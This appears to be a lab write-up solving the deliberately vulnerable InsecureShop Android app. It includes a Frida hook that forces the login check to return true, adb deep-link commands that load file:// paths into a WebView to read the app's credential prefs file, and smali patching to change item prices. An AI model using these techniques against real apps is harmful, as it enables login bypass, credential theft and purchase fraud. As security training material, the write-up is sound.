# Insecure Shop Application
#### Table of Content
1. #### [Starting the Solution](#id-1-starting-the-solution)
2. #### [Hardcoded Credentials](#id-2-hardcoded-credentials)
3. #### [Hooking The Login page](#id-3-hooking-the-login-page)
4. #### [Insecure Logging](#id-4-insecure-logging)
5. #### [Deep Link Exploitation using WebView](#id-5-deep-link-exploitation-using-webview)
6. #### [Deep Link Exploitation using WebView2Activity](#id-6-deep-link-exploitation-using-webview2activity)
7. #### [Editing on Smali Code](#id-7-editing-on-smali-code)
***
#### 1- Starting the Solution
First start to use the application and found logging and try to test the creds and how it's react and try some SQL payloads and still the same "Invalid username and password"
\
So i try to reverse the code using Jadx-gui to search for username and saw Boolean Function called `"verifyUserNamePassword()"` and this is the function that verify the username and the password.
***
#### 2- Hardcoded Credentials
When opening it I found a `getUserCreds()` function that have the Hardcoded creds of the login page.
***
#### 3- Hooking The Login page
Now i can login but if i can't found Hardcoded creds there is also another way to bypass the login by using `Frida Script` by using the Package name(`com.insecureshop.util`) , Class name(`Util`), and the required function name (`verifyUserNamePassword()`) that appear in the Util File.
and this is the Script That we can use\
Java.perform(function () { console.log("\[\*] Hooking InsecureShop Login Bypass");
```ruby
Java.perform(function () {
var LoginBypass = Java.use("com.insecureshop.util.Util");
LoginBypass.verifyUserNamePassword.implementation = function (username, password) {
return true;
};
console.log("[*] Login Bypass Hook Injected Successfully.");
});
```
and save it like `file.js` file then run the Frida sever on the emulator and run this command to Hook on the function.\
`frida -U -l file.js -f ` \
and i can login without Creds in the login page.
#### 4- Insecure Logging
Using `Logcat` command in the to see if the app logged the data and it logged it in local file system
And see it in the file using\
`cat /data/data/com.insecureshop/shared_prefs/Prefs.xml` and found the Creds here.
***
#### 5- Deep Link Exploitation using WebView
I found `WebViewActivity`here with the host `com.insecureshop` and scheme `insecureshop` with and it open it when try to access `/web OR /webview` and the parameter `url` so the final link will be something like this:\
`insecureshop://com.insecureshop/web?url=`
So i can use ADB Activity Manager so use it like this to open google website\
\
`adb shell am start -n com.insecureshop/.WebViewActivity -d "insecureshop://com.insecureshop/web?url=http://google.com"`
and it worked and open google in the WebView of the application
and also i can access file data using the `file://` schema like this\
`adb shell am start -n com.insecureshop/.WebViewActivity -d "insecureshop://com.insecureshop/web?url=file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"`
***
#### 6- Deep Link Exploitation using WebView2Activity
I found `WebView2Activity`here with the same as the previous one but without host and scheme, so i can open any file and any link without specific schema and host:
```bash
am start -n com.insecureshop/.WebView2Activity -d "file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"
file:///data/data/com.insecureshop/shared_prefs/Prefs.xml
or
https://google.com
```
***
#### 7- Editing on Smali Code
I open the file.apk file in `APKLab Extension` in Visual Studio Code and edit the prices that stored in the `Smali Code` and then rebuild the app again and i able to buy all items with another prices.
